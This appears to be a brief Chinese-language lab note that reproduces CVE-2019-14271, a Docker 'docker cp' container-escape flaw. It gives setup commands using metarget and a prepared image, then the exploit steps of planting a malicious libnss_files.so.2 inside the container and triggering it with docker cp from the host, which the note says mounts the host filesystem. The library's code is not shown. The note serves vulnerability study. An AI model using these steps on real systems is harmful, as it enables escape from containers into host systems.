NOTE

漏洞原理

参考

环境要求

  • Ubuntu 18.04
  • Docker 23.01

环境准备

1
./metarget cnv install cve-2019-14271

拉取镜像

1
2
sudo docker pull iridium191/cve-2019-14271
sudo docker run -it --rm --name=14271 iridium191/cve-2019-14271 /bin/bash

Exploit

在容器内

1
mv /libnss_files.so.2 /lib/x86_64-linux-gnu/

在容器外

1
sudo docker cp 14271:/logs ./

容器内的log即挂载了host的文件系统